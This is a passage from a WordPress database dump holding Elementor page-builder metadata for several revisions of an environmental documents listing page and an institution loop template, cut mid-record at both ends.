More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38613,5785,'_edit_lock','1771458017:38'),(26441,3869,'_elementor_pro_version','3.3.6'),(26442,3870,'_elementor_edit_mode','builder'),(26443,3870,'_elementor_template_type','wp-page'),(26444,3870,'_elementor_version','3.4.0'),(26445,3870,'_wp_page_template','default'),(26446,3870,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26448,3870,'_elementor_pro_version','3.3.6'),(26450,3871,'_elementor_edit_mode','builder'),(26451,3871,'_elementor_template_type','wp-page'),(26452,3871,'_elementor_version','3.4.0'),(26453,3871,'_wp_page_template','default'),(26454,3871,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26456,3871,'_elementor_pro_version','3.3.6'),(26457,3872,'_elementor_edit_mode','builder'),(26458,3872,'_elementor_template_type','wp-page'),(26459,3872,'_elementor_version','3.4.0'),(26460,3872,'_wp_page_template','default'),(26461,3872,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26463,3872,'_elementor_pro_version','3.3.6'),(26464,3873,'_elementor_edit_mode','builder'),(26465,3873,'_elementor_template_type','wp-page'),(26466,3873,'_elementor_version','3.4.0'),(26467,3873,'_wp_page_template','default'),(26468,3873,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26470,3873,'_elementor_pro_version','3.3.6'),(26472,3874,'_elementor_edit_mode','builder'),(26473,3874,'_elementor_template_type','wp-page'),(26474,3874,'_elementor_version','3.4.0'),(26475,3874,'_wp_page_template','default'),(26476,3874,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26478,3874,'_elementor_pro_version','3.3.6'),(26479,3875,'_elementor_edit_mode','builder'),(26480,3875,'_elementor_template_type','wp-page'),(26481,3875,'_elementor_version','3.4.0'),(26482,3875,'_wp_page_template','default'),(26483,3875,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26485,3875,'_elementor_pro_version','3.3.6'),(26486,3876,'_elementor_edit_mode','builder'),(26487,3876,'_elementor_template_type','wp-page'),(26488,3876,'_elementor_version','3.4.0'),(26489,3876,'_wp_page_template','default'),(26490,3876,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26492,3876,'_elementor_pro_version','3.3.6'),(26506,3877,'_elementor_edit_mode','builder'),(26507,3877,'_elementor_template_type','loop'),(26508,3877,'_elementor_version','3.4.0'),(26509,3877,'_elementor_pro_version','3.3.6'),(26510,3877,'_edit_lock','1629212809:38'),(26511,3877,'_wp_page_template','default'),(26512,3877,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26513,3877,'_elementor_data','[{\"id\":\"bc6018c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9a89680\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"3ade683\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fcfb3fd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"4916186\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"c79f8b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22Institutions%3A%20%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"80c0337\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"98733fb\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"institutions_category\",\"text_prefix\":\"Type: 